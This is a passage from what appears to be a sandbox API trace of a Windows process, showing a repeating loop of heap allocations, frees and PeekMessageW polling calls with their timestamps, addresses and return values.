dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0134.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0134.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0134.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0134.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0134.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0134.064] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0134.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0134.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0134.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0134.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0134.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0134.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0134.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0134.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0134.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0134.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0134.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0134.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0134.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0134.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0134.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0134.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0134.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302220 [0134.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0134.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0134.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.071] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0134.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0134.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0134.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0134.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0134.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0134.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0134.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0134.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0134.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0134.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0134.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0134.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0134.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0134.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0134.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0134.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0134.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0134.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0134.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0134.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0134.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0134.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0134.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0134.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0134.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0134.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0134.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0134.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0134.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0134.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0134.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0134.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0134.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0134.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0134.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0134.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0134.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0134.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0134.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0134.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0134.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0134.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0134.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0134.080] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0134.080] PeekMessageW (in: 